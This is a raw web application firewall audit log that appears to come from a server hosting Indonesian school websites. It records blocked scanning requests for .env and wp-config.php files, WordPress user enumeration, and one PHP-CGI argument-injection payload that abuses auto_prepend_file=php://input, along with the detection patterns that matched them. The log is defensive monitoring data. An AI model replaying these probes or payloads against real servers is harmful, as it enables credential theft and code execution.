[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "114"] [id "217210"] [rev "1"] [msg "COMODO WAF: Invalid HTTP Request Line||103.236.140.4|F|4"] [data "SSTP_DUPLEX_POST /sra_%7BBA195980-CD49-458b-9E23-C84EE0ADCD75%7D/ HTTP/1.0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745546400739806 2291 (- - -) Stopwatch2: 1745546400739806 2291; combined=862, p1=469, p2=366, p3=0, p4=0, p5=27, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72a16f25-Z-- --a6dcbc01-A-- [25/Apr/2025:09:02:03 +0700] aArtG-OdEP6frSVs8CpGWwAAAAE 103.236.140.4 57808 103.236.140.4 8181 --a6dcbc01-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 86.106.74.249 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 86.106.74.249 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --a6dcbc01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6dcbc01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745546523244974 2881 (- - -) Stopwatch2: 1745546523244974 2881; combined=1324, p1=441, p2=854, p3=0, p4=0, p5=29, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6dcbc01-Z-- --f1e0bc2b-A-- [25/Apr/2025:09:23:04 +0700] aAryCOXF4ZX3hX-IbN63kQAAAIo 103.236.140.4 34470 103.236.140.4 8181 --f1e0bc2b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36 Accept-Charset: utf-8 --f1e0bc2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1e0bc2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745547784312545 762 (- - -) Stopwatch2: 1745547784312545 762; combined=304, p1=266, p2=0, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1e0bc2b-Z-- --3b96d16e-A-- [25/Apr/2025:10:23:40 +0700] aAsAPD8HMZgF-3Y3GtFltAAAAFY 103.236.140.4 50064 103.236.140.4 8181 --3b96d16e-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 161.35.149.209 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force Cookie: X-Forwarded-For: 161.35.149.209 Accept-Encoding: gzip X-Varnish: 137479380 --3b96d16e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3b96d16e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745551420186736 851 (- - -) Stopwatch2: 1745551420186736 851; combined=343, p1=306, p2=0, p3=0, p4=0, p5=37, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b96d16e-Z-- --f7c6d279-A-- [25/Apr/2025:11:01:29 +0700] aAsJGT8HMZgF-3Y3GtFoEgAAAFI 103.236.140.4 59610 103.236.140.4 8181 --f7c6d279-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 64.23.236.146 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 64.23.236.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --f7c6d279-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7c6d279-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745553689481448 763 (- - -) Stopwatch2: 1745553689481448 763; combined=310, p1=269, p2=0, p3=0, p4=0, p5=40, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7c6d279-Z-- --14206e6c-A-- [25/Apr/2025:12:19:34 +0700] aAsbZvKu9d5eAb6Kn98XDgAAANg 103.236.140.4 50136 103.236.140.4 8181 --14206e6c-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 88.151.34.37 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 88.151.34.37 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --14206e6c-C-- --14206e6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14206e6c-E-- --14206e6c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745558374090590 5418 (- - -) Stopwatch2: 1745558374090590 5418; combined=3754, p1=462, p2=3255, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14206e6c-Z-- --7f314a0d-A-- [25/Apr/2025:15:27:29 +0700] aAtHcfKu9d5eAb6Kn98hSwAAANY 103.236.140.4 37164 103.236.140.4 8181 --7f314a0d-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 37.202.207.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.202.207.26 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --7f314a0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f314a0d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745569649119583 815 (- - -) Stopwatch2: 1745569649119583 815; combined=322, p1=287, p2=0, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f314a0d-Z-- --6f4e003a-A-- [25/Apr/2025:15:43:22 +0700] aAtLKuOdEP6frSVs8Cpw6gAAABU 103.236.140.4 41062 103.236.140.4 8181 --6f4e003a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 104.248.209.195 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 104.248.209.195 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --6f4e003a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f4e003a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745570602196727 794 (- - -) Stopwatch2: 1745570602196727 794; combined=361, p1=309, p2=0, p3=0, p4=0, p5=52, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f4e003a-Z-- --de92681a-A-- [25/Apr/2025:16:06:46 +0700] aAtQpuXF4ZX3hX-IbN7cUwAAAIw 103.236.140.4 46626 103.236.140.4 8181 --de92681a-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.148.10.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.148.10.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Accept-Charset: utf-8 --de92681a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de92681a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745572006401951 1094 (- - -) Stopwatch2: 1745572006401951 1094; combined=347, p1=308, p2=0, p3=0, p4=0, p5=39, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de92681a-Z-- --4a933d11-A-- [25/Apr/2025:17:41:06 +0700] aAtmwuXF4ZX3hX-IbN7hmwAAAIE 103.236.140.4 40404 103.236.140.4 8181 --4a933d11-B-- GET /wp-config.php.bkp HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 198.57.247.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 198.57.247.194 X-Forwarded-Proto: http Connection: close Accept: */* --4a933d11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a933d11-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745577666757616 770 (- - -) Stopwatch2: 1745577666757616 770; combined=316, p1=281, p2=0, p3=0, p4=0, p5=35, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a933d11-Z-- --1d19f665-A-- [25/Apr/2025:17:49:55 +0700] aAto0z8HMZgF-3Y3GtGAZQAAAE8 103.236.140.4 42512 103.236.140.4 8181 --1d19f665-B-- GET /app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362317 --1d19f665-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1d19f665-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578195359504 887 (- - -) Stopwatch2: 1745578195359504 887; combined=353, p1=313, p2=0, p3=0, p4=0, p5=40, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d19f665-Z-- --aeb59448-A-- [25/Apr/2025:17:49:55 +0700] aAto0z8HMZgF-3Y3GtGAZgAAAEg 103.236.140.4 42516 103.236.140.4 8181 --aeb59448-B-- GET /backend/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268852 --aeb59448-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --aeb59448-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578195557212 685 (- - -) Stopwatch2: 1745578195557212 685; combined=274, p1=241, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aeb59448-Z-- --81c1ee21-A-- [25/Apr/2025:17:49:55 +0700] aAto0z8HMZgF-3Y3GtGAZwAAAEY 103.236.140.4 42520 103.236.140.4 8181 --81c1ee21-B-- GET /api/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362320 --81c1ee21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --81c1ee21-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578195755123 716 (- - -) Stopwatch2: 1745578195755123 716; combined=302, p1=269, p2=0, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81c1ee21-Z-- --106d0271-A-- [25/Apr/2025:17:49:55 +0700] aAto0z8HMZgF-3Y3GtGAaAAAAEk 103.236.140.4 42524 103.236.140.4 8181 --106d0271-B-- GET /code/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268855 --106d0271-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --106d0271-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578195953356 677 (- - -) Stopwatch2: 1745578195953356 677; combined=263, p1=230, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --106d0271-Z-- --3a3ab105-A-- [25/Apr/2025:17:49:56 +0700] aAto1D8HMZgF-3Y3GtGAaQAAAFY 103.236.140.4 42528 103.236.140.4 8181 --3a3ab105-B-- GET /db/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362323 --3a3ab105-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3a3ab105-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578196150944 701 (- - -) Stopwatch2: 1745578196150944 701; combined=257, p1=227, p2=0, p3=0, p4=0, p5=30, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a3ab105-Z-- --ad801e04-A-- [25/Apr/2025:17:49:56 +0700] aAto1D8HMZgF-3Y3GtGAagAAAEI 103.236.140.4 42536 103.236.140.4 8181 --ad801e04-B-- GET /login/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362326 --ad801e04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ad801e04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578196348358 841 (- - -) Stopwatch2: 1745578196348358 841; combined=329, p1=286, p2=0, p3=0, p4=0, p5=42, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad801e04-Z-- --29b49551-A-- [25/Apr/2025:17:49:56 +0700] aAto1D8HMZgF-3Y3GtGAawAAAFc 103.236.140.4 42540 103.236.140.4 8181 --29b49551-B-- GET /api_v1/go/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268861 --29b49551-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --29b49551-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578196546751 684 (- - -) Stopwatch2: 1745578196546751 684; combined=252, p1=220, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29b49551-Z-- --3f27bf25-A-- [25/Apr/2025:17:49:56 +0700] aAto1D8HMZgF-3Y3GtGAbAAAAFI 103.236.140.4 42544 103.236.140.4 8181 --3f27bf25-B-- GET /api_v1/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362329 --3f27bf25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3f27bf25-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578196743662 682 (- - -) Stopwatch2: 1745578196743662 682; combined=259, p1=228, p2=0, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
